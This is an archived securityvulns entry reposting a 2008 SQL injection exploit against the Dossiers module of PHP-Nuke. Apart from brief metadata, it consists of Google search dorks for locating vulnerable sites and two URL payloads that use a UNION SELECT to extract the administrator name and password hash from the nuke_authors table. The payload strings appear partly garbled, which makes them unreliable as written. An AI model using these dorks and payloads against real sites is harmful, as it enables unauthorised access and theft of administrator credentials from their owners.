PHP-Nuke Module Dossiers Injection(did)

2008-02-22T00:00:00
ID SECURITYVULNS:DOC:19236
Type securityvulns
Reporter Securityvulns
Modified 2008-02-22T00:00:00

Description

PHP-Nuke Module Dossiers Injection(did)

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : hackturkiye.hackturkiye@gmail.com

DORK 1 :allinurl:"modules.php?name=Dossiers"did

DORK 2 : allinurl:

EXPLOIT :

admin

modules.php?name=Dossiers&pa=showpage&did=-9999999//union//select//aid,1//from//nuke_authors/where%20admin%201%200%202

pass

modules.php?name=Dossiers&pa=showpage&did=-9999999//union//select//pwd,1//from//nuke_authors/where%20admin%201%200%202

S@BUN i AM NOT HACKER S@BUN